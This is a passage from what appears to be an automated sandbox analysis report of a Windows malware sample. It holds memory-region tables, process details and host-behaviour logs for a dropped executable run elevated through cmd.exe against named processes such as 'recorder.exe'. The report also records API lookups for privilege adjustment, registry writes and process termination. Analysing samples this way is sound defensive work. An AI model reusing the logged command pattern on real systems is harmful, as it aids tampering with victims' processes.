| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #180: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #180 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "ImagingDevices.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:11, Reason: Child Process |
| Unmonitor | End Time: 00:03:15, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfd0 |
| Parent PID | 0x208 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FE0
0x
DF0
0x
150
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x0086ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x00a0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x009f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a00000 | 0x00a00000 | 0x00a0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00b90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x01f9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0218ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:45 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #182: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #182 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "recorder.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:11, Reason: Child Process |
| Unmonitor | End Time: 00:03:19, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x408 |
| Parent PID | 0x524 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1A4
0x
CA4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d30000 | 0x00d30000 | 0x04d2ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04d4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d30000 | 0x04d30000 | 0x04d3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04d51fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d50000 | 0x04d50000 | 0x04d53fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d60000 | 0x04d60000 | 0x04d73fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04dbffff | Private Memory | rw |
|
|
|
- |
